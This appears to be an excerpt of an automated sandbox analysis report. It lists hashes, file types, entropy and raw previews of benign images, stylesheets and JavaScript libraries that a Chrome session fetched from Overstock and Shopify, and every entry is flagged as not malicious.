                                                                                                                                                          SHA-512:E89D63915811313DAA9E6973AE86FF7D97EAF590EA1B886BA21965AF2454C993FE7DD114309C03F2E773424C732640729E670FD8FE9C8E6BF3295F44DD0B1FE9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Madison-Park-Egyptian-Cotton-Solid-Blanket.jpg?v=1717238692&width=320
                                                                                                                                                          Preview:RIFF.$..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .!...p...*@.@.>9..D"!....x ....p.. .M ...o.|$...=....w....7....4..........z..<z...z..m...w.....[.}}w..+.....`..]B;..O........^y..._.........O..`.....g...o.?....O.%..........zI.....a...=.....r.0..V.......Z.{w+C.n.ha...=.....r.0..V........4..|.....4EJ..'.....t.X:...q.o.LY...0...A..R..._..v.T.}:...S...C}.S........Q;....Q.....W..B...3..9.*~AA..K7...jd....$....9...hg.Z.&nD.!S.3.^p....f....%.Q..9.9..~..~(?.U.vJ..3.`..c).y..89.'|....b.E}qO..$.;.jrc...fxi.d.......a...F..T...h~O.o'p.z.L..!... 1.>.b..<..B?.@..[r.2.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15860
                                                                                                                                                          Entropy (8bit):7.951362308508612
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:E35CB16E9F391240EE1D601FE00336AF
                                                                                                                                                          SHA1:DBD41AA4D8DFAB60A644D5B83E917A5B54007A21
                                                                                                                                                          SHA-256:1E3E8DA916A9388764C8BC25BA3BECF99B215230020000608CFBE079F17F1585
                                                                                                                                                          SHA-512:3AA7A0CEF2D7330D29FD2F4CDB78F0F6F43041674B40142C4355471B41558270445E5AE61A641174B4304FE364C9B15BA7545B20408A75408B850451E8D0BF23
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Annette-Cotton-Velvet-Bolster-Pillow_5e1fd82c-c393-442b-ac0a-92eaf8a92473.jpg?v=1717270922&width=320
                                                                                                                                                          Preview:RIFF.=..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 \;.......*@.@.>9..C.!.")Tj.@..gm...e}..Q....J.r.nCly|{9?...g..m._.=.~.~.{.z\.U...c.S......]..X...>W../..4........;./...}...&.~`.........~e.z*.@.......R.......dQI.%..+...ys.....?:.........y..................!...E.0.gzf.U...&.k....~Ag....=..(..-.3.].....c.8.._^U5..E... .Y..u)0..M........x..-r..N.Vs......~.....y..g....>....w6D.....B.8..M....e.8bV....=.Ov.q.._..I]..Yx...aJ.=XL."@.X..=.AF..U...i.".P.=.....j.......w..0K....8xq Z.N.:J...#..6.].7.,x.i.J....d....G.>...m.Y..46.'8...F.F.p[Q....wr..%:.<........h.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (10966)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11046
                                                                                                                                                          Entropy (8bit):5.287509630101107
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0C0766FDA4B06ECB7B2F30A7A5DC2F08
                                                                                                                                                          SHA1:D6C671ED34BC32C70097D17142A18E8B5E95FAEC
                                                                                                                                                          SHA-256:C917657BEDCA3C54045064205546102E61943E32E3105D949E0BEC8C4C7DEA1B
                                                                                                                                                          SHA-512:849E281088D005E486AE98CAF12EA327CE374E89AAB89DB78A8C30DC5E50839D7B709A337734AB59D37A5B574D24ACFC783B46B7D9A3043B5C6312F100901809
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.(self.pwrClg=self.pwrClg||[]).push([[280,284],{36760:(t,e,r)=>{"use strict";r.r(e),r.d(e,{default:()=>O});var n=r(48812),i=r.n(n),o=r(43688),a=r.n(o),p=r(84960),s=r.n(p),l=r(85668),c=r(85876),u=r(76840),d=r(92552),h=r(91672),g=r(90736),m=r(8980),v=r(86440),y=r(95668),f=r(82132),_=r(65056),w=r(60360),C=r(6880),S=r(77e3),N=["louserzations","merchantProperties","features"],x=function(t){function e(){return t.apply(this,arguments)||this}s()(e,t);var r=e.prototype;return r.componentDidMount=function(){var t,e,r=this.props,n=r.isLoading,i=r.config,o=r.getSnippets,a=r.getReviews,p=r.rollup,s=r.displayApi;("boolean"!=typeof n&&(i.batched_page_ids?o(s,i):a(s,i)),null!=p)&&(null===(t=(e=this.props).onLoad)||void 0===t||t.call(e))},r.componentDidUpdate=function(t,e){var r,n;null==t.rollup&&null!=this.props.rollup&&(null===(r=(n=this.props).onLoad)||void 0===r||r.call(n))},r.render=function(){var t=this.props,e=t.confi
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65199)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):145022
                                                                                                                                                          Entropy (8bit):5.6071774364186355
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:57535F7B955C05CE7B6A25F6C80BC158
                                                                                                                                                          SHA1:67F3658671E605C20EF028C6707676F6AE015056
                                                                                                                                                          SHA-256:D00499EBFD590E19F7065194B82A2B97105598FAFD621B3888916384443B562E
                                                                                                                                                          SHA-512:86E3068DCB9F1656624BFC3F28BD5E5CB30548A7C585CCA227C8ABC65D98E9C54921CC57E6CF724ED44692DCB0FA2DD0304DA5B1C2DBF4A9BF0F69ABC3F6EC47
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/VaultedPayment.C2_V0WLt.js
                                                                                                                                                          Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-PayPalExpressPaymentMethod.C4v2ucuZ.js","app.CRtF78CU.js","assets/app.BK5OxPpc.css","OnePageModal.BVW5k1eZ.js","useShowShopPayOptin.fhQjPey-.js","Rollup.B3ludNL-.js","assets/Rollup.o9Mx-fKL.css"])))=>i.map(i=>d[i]);.import{e as L,c1 as ce,as as Y,a as t,a7 as Q,ab as p,e6 as st,jt as Fe,ay as B,b_ as zn,b$ as Ra,fp as sn,hX as wr,pr as Er,hh as Mr,h as T,I as de,bT as Oe,ps as on,a5 as Le,a9 as H,jA as fe,aa as te,pt as Oa,y as k,k as kt,A as ie,bl as we,jN as Ir,jw as Lr,r as Pe,eX as Va,ji as ln,au as Ve,a2 as We,a3 as le,ju as ot,mm as kr,gm as Tr,lr as ue,bx as za,ak as cn,z as it,H as ke,pu as Ha,dG as xr,fG as Tt,pv as Wa,ga as Ga,ll as dn,T as X,pw as Ya,px as $a,py as Ua,ic as Hn,ek as ja,l_ as Za,lX as un,pz as Ka,mN as Xa,pA as Ja,ew as Qa,a4 as xt,mB as es,d as Z,fE as Nr,bU as mn,a6 as re,aF as et,V as ae,mC as pn,j as me,pB as Ke,q as V,c8 as Fr,c9 as ts,pC as ns,cr as rs,aN as hn,ad as lt,bL as as,hi as $
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):33
                                                                                                                                                          Entropy (8bit):4.741363816328152
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:FCE53AADCC76D6FE802E7998503F1622
                                                                                                                                                          SHA1:56FF4B7AD4B70A23D00AD38041ADA836619CC910
                                                                                                                                                          SHA-256:0821951C01640DB472308C1855DB1C5A7AAF08E8EC8C609E4FAB9D5D864F63E8
                                                                                                                                                          SHA-512:66220A964E574CBB3BD3A4A583E4CBDE65C65A935916D492B19E4A83DF94046E2816110A0961E35148B4EAFD305459673A3EAD7C8ED885798F7679C3DA695310
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/PickupPointCarrierLogo.C0wRU6wV.css
                                                                                                                                                          Preview:.veGnT{display:block;width:100%}.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):40265
                                                                                                                                                          Entropy (8bit):7.9651706566575715
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D1E6949B8E106A70170F07E8B2D32DFF
                                                                                                                                                          SHA1:88158D9E27719981A0AA17F935155A3236C86277
                                                                                                                                                          SHA-256:C83132169615526DC1753C9971404196685EC8F985632E82C1073EE6D13CD524
                                                                                                                                                          SHA-512:6C989E75E55D3D0B1DDB8983DB799D79764592AED783353511BAAC252AA5D0EADF9E106C7353BC1F27905D57156638E6B6DA293EEA63BFE15482428828C2BA00
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@..........................................................................................x.I.#....X-.W.E..d.B.].[..@0eu./.../}...V.....X....K.f[.+<u.-....[......&fLI...T*a....<B...M..g..j.+....^.$jV...v.e..V)...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (34424), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):34424
                                                                                                                                                          Entropy (8bit):5.303388949056239
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:CC519AE088319BBCDACAEC04285B3188
                                                                                                                                                          SHA1:93677FEF402AC29784512AB2D0690771E0A364D4
                                                                                                                                                          SHA-256:8CDAD1EBA19303C9AECB34392CCBA17F60FD672CCA22D1537C09BA543F95660D
                                                                                                                                                          SHA-512:33959F196AE7EAC1A1E24EC173673A0C33E439A65E5B4CE0DC06B7D258D6E797C869E06178CF1DA8C6839679239255C1DADD7FB7AC819FF259905D533372D2CE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):"object"==typeof exports?exports.Statsig=e():t.Statsig=e()}(this,()=>(()=>{"use strict";var $Q=(e)=>Object.defineProperty(e,"__esModule",{value:!0});var $Q2=(a,b,c)=>Object.defineProperty(a,b,c);var $P=(a,b)=>Object.assign(a,b);var $A=()=>((t,r,u,l)=>{return new(u=u||Promise)(function(n,e){function i(t){try{s(l.next(t))}catch(t){e(t)}}function o(t){try{s(l.throw(t))}catch(t){e(t)}}function s(t){var e;t.done?n(t.value):((e=t.value)instanceof u?e:new u(function(t){t(e)})).then(i,o)}s((l=l.apply(t,r||[])).next())})});var i={845:(t,i,e)=>{$Q2(i,"__esModule",{value:!0}),i.t=i.i=i.o=void 0,i.o=()=>__STATSIG__||u,i.i=t=>(0,i.o)()[t];i.t=t=>{var e=(0,i.o)();return t?e.instances&&e.instances[t]:e.lastInstance};var n,s="__STATSIG__",r="undefined"!=typeof window?window:{},e=void 0!==e.g?e.g:{},o="undefined"!=typeof globalThis?globalThis:{};const u=null!=(n=null!=(
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12861
                                                                                                                                                          Entropy (8bit):7.795670328924416
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:E06AF2CC304A10EACCDC23440EF03A7D
                                                                                                                                                          SHA1:4A7F3B0956D0143FC79EC1783DA09AE4A5D0CAB7
                                                                                                                                                          SHA-256:870919EDF8047909F322954C909099642801D3AEDC7A62B03ADC7F83776C5EDB
                                                                                                                                                          SHA-512:0AB029AC26F68DD79512600F312B3F815A51D5EEFBFA66277807C204B12AB8411DC9E4E376E18E6DC3D0C70655FE8CE5C7DFCF3A96CBED4C667AD34BF729D198
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@.......................................................................................................................................L.k.1..;...K.~.o{`.................K.*K.R.R.R.mg^...=..'<..........|c..y......W
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1095)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1201
                                                                                                                                                          Entropy (8bit):5.048202732843206
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:19CFEFED0B7CCCB1C2029704147E2417
                                                                                                                                                          SHA1:3B5EFDAB455F5079A324776F1F5DB883EEF90F2D
                                                                                                                                                          SHA-256:24BC757E64B4A82A87A5ACFD91C0BBE6CCE187202D569590F0C6E7A6F35896C2
                                                                                                                                                          SHA-512:B7AF9ACAA8C5A27F65342D72E1FC5C1178CBBE42C0BCD5EC762AF2D1AE937FC0B602CF75205F87604FAC85EA04E775CA165E428D6205DD9CD7DEB2D262071FFF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/component-tooltip.css?v=55398609335921445441729142870
                                                                                                                                                          Preview:.tooltip{position:relative;z-index:1;display:flex;background:none;box-shadow:none;border:0;-webkit-appearance:none;appearance:none;padding:0;margin:0}.tooltip:before{content:"?";font-size:calc(var(--font-body-scale) * 1.4rem);font-weight:700;width:1.8rem;height:1.8rem;display:flex;align-items:center;justify-content:center;border-radius:50%;line-height:0;position:relative;background-color:rgb(var(--color-background));color:rgb(var(--color-foreground));cursor:help;border:1px solid rgb(var(--color-foreground))}[data-tooltip]:before,.tooltip>span{position:absolute;bottom:100%;right:0;margin-bottom:.5rem;max-width:20rem;width:max-content;padding:.85rem 1rem;border-radius:var(--border-radius-base);background:#000000d9;color:var(--color-base-white);text-align:left;display:none;font-size:calc(var(--font-body-scale) * 1.3rem);text-indent:0}.tooltip:focus-visible>span,.tooltip:focus>span,.tooltip:hover>span{display:block}[data-tooltip]{position:relative}[data-tooltip]:hover:before{display:block;
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):74933
                                                                                                                                                          Entropy (8bit):5.4560433293791375
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BAC6F231EE4E0D550727AA5A47760BE3
                                                                                                                                                          SHA1:7FD0F1BA0D886F3353938498F66D41653005A0D7
                                                                                                                                                          SHA-256:A75566A72600CF9687869E490AAAF4A3180125156F53319351432749D7D2F2C4
                                                                                                                                                          SHA-512:6A3EA7F256199D5DC0913E48BC2EC00CA3FA709C34969B82BA4D5815A4915F8DA4B58E12F77273E9AEA231C89C7BCEF30A060AF6373031C9D4ACAD9EAA2FE28E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/wpm@8688a91bwbd065f36p51297ecfmc385dee2/custom/web-pixel-17006751@79/sandbox/modern/
                                                                                                                                                          Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):23984
                                                                                                                                                          Entropy (8bit):7.970735985429969
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0EA12B9E829E5DA28E79EB130C570EEE
                                                                                                                                                          SHA1:1E5E9F0B7CA6B378EF389182644ABBC73CA66EAB
                                                                                                                                                          SHA-256:C0E65B4894250AB08160505271DBD85EED42DB3D0FC2FDAB49A8AFD0030A412B
                                                                                                                                                          SHA-512:AC5F3CDC495C93ED9FE03DC446CF4569652FE0AF605E68D71B0E5C0289E6E144EE3BA77AF604DA76AC2BBE38C60E8A1627574D9B5BE99D707085BB623C205009
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Adley-Purple-6-Piece-Reversible-Daybed-Set-by-Intelligent-Design.jpg?v=1717245108&width=320
                                                                                                                                                          Preview:RIFF.]..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .[..0(...*@.@.>9..C.!......X..&.%..K...%h<.......f.......U..../*Op.K.o../............E.../._..........g.C./...?.}.?........y.3....po._..5.s>.?................P.....u.i.~.|...._.....{....+.|..u.....}..K.s._............?....&.q.=........S............OR............r.`................`.e...'.?./..........s...'.o.....~....g.G.7..................7...r._./..~.};.d.<..8.l.:..I.*...A....U..FZ~...V...S......%.......e.......X..gk.?.....%..f.y|..g...(./V.}.8.?...6,.....?......o.@,...E.h./..6.....~L...T..K...`........-.^
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (39697)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):113898
                                                                                                                                                          Entropy (8bit):5.472136262838798
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:B84C2AAFE6605FF14863A2CE23EFD841
                                                                                                                                                          SHA1:AF3AC7BE36217FF591B8AE7A7639693919F033C1
                                                                                                                                                          SHA-256:5765F2E6F180B39B5BA0BF746317E0AC5F6AD7E83A04047EFA5205B4619CED9A
                                                                                                                                                          SHA-512:7A4B0EEACD181FDEF89BBB858FA207BE9B5C9F8982D0A33DF8B26F0B65496CAEB9F1BF8C190F9FF2E39ACD09BD31086DC6FBFEC36434B1B5A4220D7BA6BC1F48
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.(self.pwrClg=self.pwrClg||[]).push([[976],{71387:e=>{e.exports={cloudinaryUploadBase:"https://api.cloudinary.com/v1_1/powerreviews/auto/upload",cloudinaryDownloadBase:"https://media.powerreviews.com",local:{name:"local",entryPath:"https://localhost:3001/",assetPath:function(){return"https://localhost:3001/"},akamaiUIBase:"https://localhost:3001",awsUIBase:"https://localhost:3001",writeBase:"https://devwriteservices.powerreviews.com",b2cReadBase:"https://dev-origin-readservices-b2c-api.powerreviews.com",b2cReadOrigin:"https://dev-origin-readservices-b2c-api.powerreviews.com",b2cReadOS:"https://dev-display-api.powerreviews.io",b2cReadProxy:"https://devui.powerreviews.com/api/",cloudinaryImagePreset:"dev_preset",cloudinaryVideoPreset:"dev_video_preset",trackingBase:"https://t-dev.powerreviews.com",servicesBase:"https://qaservices.powerreviews.com/JSController.do",uiPRBase:"https://localhost:3001",versionFullJS
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (19350), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):19350
                                                                                                                                                          Entropy (8bit):5.19688399030424
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:EBA56CA07CC34448E0BD43C9D4157C8B
                                                                                                                                                          SHA1:84E6FEC79CA04C3A812EBB98106C0DB7B6F4E108
                                                                                                                                                          SHA-256:4FFB65B11C10E1E9A868C23BC1E39B4B091B6864387CD55278A10EC4BD663288
                                                                                                                                                          SHA-512:09FCA43B1D56D2307459CA27C379F3D4779C6AA9BADCA8FEE1BA36D7CD56C97F40CDA1AB14EC654E398DFFF15E562608FC2FF6EFEF396ADD47E9B7DEDC9AD319
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/s/assets/external/app.js
                                                                                                                                                          Preview:(function(){var r,t,a,s;window._Shopify=window._Shopify||{},r=["Shopify.API.reportScroll"],a=function(e,t){var n,i,o;if(("undefined"!=typeof console&&null!==console?console.log:void 0)&&(("undefined"!=typeof ShopifyApp&&null!==ShopifyApp?ShopifyApp.debug:void 0)||("undefined"!=typeof ShopifyPOS&&null!==ShopifyPOS?ShopifyPOS.debug:void 0)||t)&&!window.Teaspoon){for(i=0,o=r.length;i<o;i++)if(n=r[i],0<e.indexOf(n))return;return console.log("ShopifyApp "+e)}},s=function(e){return("undefined"!=typeof console&&null!==console?console.warn:void 0)&&!window.Teaspoon?console.warn("ShopifyApp "+e):a(e,!0)},t=function(e){var t,n,i,o,r,a,s,l;if(!(e.document&&e.document.body&&e.navigator&&e.navigator.userAgent))return!1;if(!(-1!==(l=e.navigator.userAgent).search(/Shopify Mobile|Shopify POS|Shopify Ping/g)&&-1!==l.search("iOS")))return!1;for(o=e.document.createElement("style"),a="",r=/(\@media[^\{]*)print([^\{]*\{)/g,n=0;n<e.document.styleSheets.length;){for(s=e.document.styleSheets[n],i=0;i<s.cssRul
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):34670
                                                                                                                                                          Entropy (8bit):7.984183596515911
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:A15BA6D8677FC92C14DD868FA6C0E6C0
                                                                                                                                                          SHA1:07B8D1FD8A441090BFBA85CA7A4C68AA501334E5
                                                                                                                                                          SHA-256:CC40CB2350AE00F993631CFF1DAC73D89DD3D29ABA1EF6E16A1E7E31EF03E0C0
                                                                                                                                                          SHA-512:A62C806CB0F46F03A880A1FD39D6E615F1EF4E575728F51AB4AFF36437C0FC76402AD530C2EB155FB309057A177F98EEE372000198C8CB9974641DBE496AFCF4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/collections/Hanlee-Outdoor-Rustic-Acacia-Wood-Folding-Adirondack-Chair-_28Set-of-2_29-by-Christopher-Knight-Home.jpg?v=1710950811&width=320
                                                                                                                                                          Preview:RIFFf...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....W...*@.@.>9..C"!!.... .....w.../...WH.K....y...W...]..'..+............?.=...yf.........K...../._t..=A?.......{........................../....`......=@<...._..>.....?....K.O..m?....`.....C.Y.........?.w...~)...3..#..._...~..{...>.....|...._.?...{O.O...?....G.s.....z........../...............^.....Y...........r...........w........i.{.....?..............o.........=.g?..D.@5...L....S.^G|..t....gxE..u2.........T.{B...x.u...r.T......r@)d4$.....vd.._.....)...{D......>%..N.....k..]..@..9...n/f0.....S....]M.!..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65451)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):89476
                                                                                                                                                          Entropy (8bit):5.2896589255084425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                                                          SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                                                          SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                                                          SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):36512
                                                                                                                                                          Entropy (8bit):7.985572638903345
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:3824A3E7C6C79DC2A946F24C230F5D22
                                                                                                                                                          SHA1:90CA60A07139D9E3BC817AA8B1670CADF901CB65
                                                                                                                                                          SHA-256:1B5087A8BB633E750BC750D8B2BA91E0704338CD8DB9544C4F1DE9F1FC4279DB
                                                                                                                                                          SHA-512:00C6D58A1AB81F921D8FBAA5A1DC2BD448D856250D09955BF42D09F4056415AC663F92AE5C6DE9A4D094155E36EA023A17688726C071F8BB12C9D2EF15CE2B2A
                                                                                                                                                          Malicious:false
